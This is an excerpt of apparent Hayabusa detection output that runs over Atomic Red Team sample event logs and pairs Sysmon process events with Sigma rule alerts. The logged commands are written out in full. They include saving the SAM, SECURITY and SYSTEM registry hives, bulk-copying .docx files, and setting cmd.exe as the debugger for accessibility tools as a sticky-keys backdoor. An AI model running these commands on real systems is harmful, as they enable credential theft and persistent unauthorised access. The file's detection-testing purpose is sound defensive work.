C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.921 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent 
Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,low,Query 
Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.147 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.375 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.559 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,low,Query 
Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\Security security.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\System system.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM 
sam.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\SAM sam.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:43.569 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,medium,Automated Collection Command Prompt,,rules/sigma/process_creation/process_creation_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /S /D /c"" dir c: /b /s .docx "" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b 
/s .docx | findstr /e .docx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,medium,Automated Collection Command Prompt,,rules/sigma/process_creation/process_creation_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:52.053 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: findstr /e .docx : Path: C:\Windows\System32\findstr.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:52.210 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""for /R c: %%f in (*.docx) do copy %%f c:\temp\"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:52.275 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:02.174 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:02.194 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:02.249 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:07.279 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:07.299 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:07.357 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:10.266 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:10.282 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor 
Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:10.324 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:13.109 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:13.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:13.185 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:14.678 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
